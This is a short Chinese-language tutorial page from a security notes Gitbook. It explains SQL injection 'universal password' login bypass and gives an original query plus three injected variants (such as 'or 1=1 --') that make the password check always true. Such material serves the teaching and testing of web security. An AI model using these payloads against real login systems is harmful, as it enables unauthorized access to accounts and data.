1.1. 介绍

熟悉了前面的注入,这个就很好理解了,就是利用盲注达到永为真的结果即可。

1.2. 应用场景

从名字也可以看出来,和密码有关,那么一般就用于登陆接口,或者有其他类似判断的功能点也可

1.3. 举例

-- 原语句
select password from users where username="admin_sqli";

万能密码:

select password from users where username="admin" or "1"="1";
select password from users where username="admin" or 1=1 -- 
select password from users where username="admin" or 2*2=4 --
Copyright © d4m1ts 2022 all right reserved,powered by Gitbook该文章修订时间: 2022-01-25 15:14:08

results matching ""

    No results matching ""